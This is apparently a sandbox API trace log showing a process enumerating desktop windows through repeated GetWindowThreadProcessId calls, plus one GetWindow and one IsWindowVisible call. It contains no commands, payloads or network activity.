	[0630.550] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1bb0
	[0630.550] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1acc
	[0630.550] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1a2c
	[0630.550] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x19a8
	[0630.550] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1944
	[0630.550] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x18c8
	[0630.550] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x18ac
	[0630.551] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x18ec
	[0630.551] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1898
	[0630.551] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc98
	[0630.551] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x153c
	[0630.551] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1808
	[0630.551] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x12a4
	[0630.551] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1740
	[0630.551] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x16c4
	[0630.551] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1820
	[0630.551] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x16ac
	[0630.551] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1858
	[0630.552] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1664
	[0630.552] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10b4
	[0630.552] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10ac
	[0630.552] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10ec
	[0630.552] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1068
	[0630.552] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x17e0
	[0630.552] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x102c
	[0630.552] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x17a4
	[0630.552] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1050
	[0630.552] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1694
	[0630.553] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1770
	[0630.553] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1720
	[0630.553] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x165c
	[0630.553] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1578
	[0630.553] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x16c0
	[0630.553] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x161c
	[0630.553] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1638
	[0630.553] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x15c8
	[0630.553] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1554
	[0630.553] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1674
	[0630.553] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1520
	[0630.554] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x14bc
	[0630.554] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf8c
	[0630.554] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe9c
	[0630.554] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1434
	[0630.554] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x14ec
	[0630.554] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xfcc
	[0630.554] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x12ac
	[0630.554] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1484
	[0630.554] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x934
	[0630.554] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc0c
	[0630.554] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb08
	[0630.555] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x948
	[0630.555] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1178
	[0630.555] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x13e0
	[0630.555] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xcd0
	[0630.555] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x13fc
	[0630.555] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xdc8
	[0630.555] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc18
	[0630.555] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc2c
	[0630.556] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa1c
	[0630.556] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1244
	[0630.556] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xdb0
	[0630.556] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1398
	[0630.556] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1358
	[0630.556] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1370
	[0630.556] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1340
	[0630.556] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x130c
	[0630.556] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x12c0
	[0630.557] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x12e4
	[0630.557] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1270
	[0630.557] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1298
	[0630.557] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x120c
	[0630.557] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x122c
	[0630.557] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x11c4
	[0630.557] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x11b0
	[0630.557] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1188
	[0630.558] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1148
	[0630.558] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1160
	[0630.558] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10fc
	[0630.558] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe34
	[0630.558] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xea4
	[0630.558] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x514
	[0630.558] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe48
	[0630.558] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xbc8
	[0630.559] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xdf8
	[0630.559] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x318
	[0630.559] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xcac
	[0630.559] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x8bc
	[0630.559] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf9c
	[0630.559] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf48
	[0630.559] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe40
	[0630.559] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xecc
	[0630.560] GetWindow (hWnd=0x10410, uCmd=0x4) returned 0x0
	[0630.561] IsWindowVisible (hWnd=0x10410) returned 0
	[0630.561] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xeb8
	[0630.561] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe80
	[0630.561] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe98
	[0630.562] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe60
	[0630.562] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xee4
	[0630.562] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf00
	[0630.562] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xdf0
	[0630.562] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe1c
	[0630.562] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xdd0
	[0630.562] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xd94
	[0630.562] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xd74
	[0630.563] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xd00
	[0630.563] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xcd8
	[0630.563] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc84
	[0630.563] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xca4
	[0630.563] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc64
	[0630.563] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc24
	[0630.563] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb84
	[0630.563] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xbac
	[0630.563] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x384
	[0630.564] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xab8
	[0630.564] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x33c
	[0630.564] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa44
	[0630.564] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa64
	[0630.564] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x8a8
	[0630.564] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xaf0
	[0630.564] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x88c
	[0630.564] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb04
	[0630.565] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x910
	[0630.565] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x230
	[0630.565] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xac0
	[0630.565] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xab4
	[0630.565] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xaac
	[0630.565] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x3d0
	[0630.565] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x978
	[0630.565] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa7c
	[0630.566] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x59c
	[0630.566] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa88
	[0630.566] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa6c
	[0630.566] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa68
	[0630.566] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x9f8
	[0630.566] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa04
	[0630.566] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x924
	[0630.566] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x8dc
	[0630.566] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x7dc
	[0630.567] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x768
	[0630.567] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x764
	[0630.567] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x820
	[0630.567] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x810
	[0630.567] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x794
	[0630.567] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x83c
	[0630.567] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x7ac
	[0630.567] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb44
	[0630.568] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb5c
	[0630.568] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x838
	[0630.568] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.568] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.568] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.568] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.568] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.568] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.569] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.569] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.569] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x818
	[0630.569] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x5b8
	[0630.569] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x494
	[0630.569] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1ec
	[0630.569] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x440
	[0630.569] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x7e8
	[0630.569] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x730
	[0630.570] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x2c8
	[0630.570] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x31c
	[0630.570] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x330
	[0630.570] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x128
	[0630.570] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x5c8
	[0630.570] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x6f8
	[0630.570] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x358
	[0630.570] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x73c
	[0630.570] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb0
	[0630.571] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x250
	[0630.571] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x240
	[0630.571] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x790
	[0630.571] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x61c
	[0630.571] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x540
	[0630.571] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x538
	[0630.571] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x568
	[0630.571] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x538
	[0630.571] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x568
	[0630.571] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x538
	[0630.571] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x540
	[0630.572] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x540
	[0630.572] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x57c
	[0630.572] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x460
	[0630.572] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x554
	[0630.572] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.572] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x528
	[0630.572] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.572] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.572] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.572] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x79c
	[0630.572] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.573] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4e0
	[0630.573] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.573] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x460
	[0630.573] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x460
	[0630.573] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x44c
